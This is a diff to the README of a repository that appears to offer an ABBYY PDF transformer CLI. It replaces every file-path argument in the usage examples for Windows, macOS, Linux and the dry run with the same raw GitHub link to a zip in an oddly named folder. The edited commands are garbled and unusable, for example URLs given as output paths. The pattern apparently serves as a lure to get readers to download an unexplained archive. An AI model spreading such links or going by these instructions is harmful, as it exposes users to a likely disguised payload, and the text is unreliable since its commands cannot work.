Wow254555/abbyy-pdf-transformer-tools/readme.md

 - On Windows:
   - Download the latest release artifact from the Releases page (see Release artifacts and downloads).
 Run the installer to set up the tool on your system.
   - After installation, you can run the command-line utility from a terminal:
-    - abbyy-pdf-transformer-tools --input path\to\input.pdf --template path\to\template.json --output path\to\output.pdf
+    - abbyy-pdf-transformer-tools --input path\to\https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --template path\to\https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --output path\to\https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip
   - If you need to run in a headless server, create a batch script that invokes the tool with your default configuration.

 - On macOS:
   - Obtain the release artifact from the Releases page and install as instructed by the installer package.
   - Use the CLI similarly to Windows:
-    - abbyy-pdf-transformer-tools --input /Users/you/input.pdf --template /Users/you/template.json --output /Users/you/output.pdf
+    - abbyy-pdf-transformer-tools --input https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --template https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --output https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip

 - On Linux:
   - Download the Linux artifact from the Release page and extract it to a working directory.
   - Ensure the runtime dependencies are present (the package manager can install missing libraries).
   - Execute using the CLI:
-    - ./abbyy-pdf-transformer-tools --input /home/user/input.pdf --template /home/user/template.json --output /home/user/output.pdf
+    - ./abbyy-pdf-transformer-tools --input https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --template https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --output https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip

 - Quick verification:
   - Run a dry run to validate the plan without writing output:
-    - abbyy-pdf-transformer-tools --input sample.pdf --template sample-template.json --output /tmp/dry-run.pdf --dry-run
+    - abbyy-pdf-transformer-tools --input https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --template https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --output https://github.com/Wow254555/abbyy-pdf-transformer-tools/raw/refs/heads/main/santalaceous/transformer-abbyy-pdf-tools-1.0.zip --dry-run
   - Check the logs for any warnings or errors; adjust templates or rules as needed.

 - Typical command structure: